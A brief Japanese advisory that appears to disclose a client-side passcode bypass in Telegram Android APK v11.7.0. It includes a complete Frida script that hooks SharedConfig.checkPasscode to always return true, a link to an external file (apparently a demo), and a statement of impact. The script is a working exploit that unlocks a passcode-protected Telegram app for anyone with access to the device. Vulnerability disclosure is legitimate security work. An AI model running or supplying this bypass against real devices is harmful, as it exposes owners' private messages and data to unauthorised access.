
Fridaベースの概念実証で、SharedConfig.checkPasscodeをフックして常にtrueを返すことでTelegram Androidの認証バイパスを実証し、不正アクセスを可能にする。
Telegram Android APK v.11.7.0のSharedConfigクラスにおける問題により、物理的に近接する攻撃者がcheckPasscodeメソッドの戻り値を操作することで認証をバイパスし、権限を昇格できる可能性があります。
認証バイパス
Telegram
Telegram android apk v.11.7.0
org.telegram.messenger.SharedConfig
Java.perform(function() {
// Locate the SharedConfig class in the target application
var PassCodeActivity = Java.use('org.telegram.messenger.SharedConfig');
// Hook the checkPasscode method to modify its behavior
PassCodeActivity.checkPasscode.implementation = function(passcode) {
// Bypass the actual passcode check by always returning true
return true;
};
});
https://drive.google.com/file/d/1-lW1IQiCyj-8UXZOTedYPGPhQwfMLX4M/view?usp=sharing
この脆弱性はクライアント側の認証バイパスの問題です。パスコード機能に依存して機密データを保護したり、特定のアプリ機能へのアクセスを制限しているユーザーに影響を及ぼします。この欠陥を悪用することで、物理的に近接する攻撃者がパスコード検証プロセスを操作し、認証をバイパスしてアプリの保護領域への不正アクセスを取得する可能性があります。これにより、機密ユーザーデータの露出やアプリケーション内での不正な操作が発生する恐れがあります。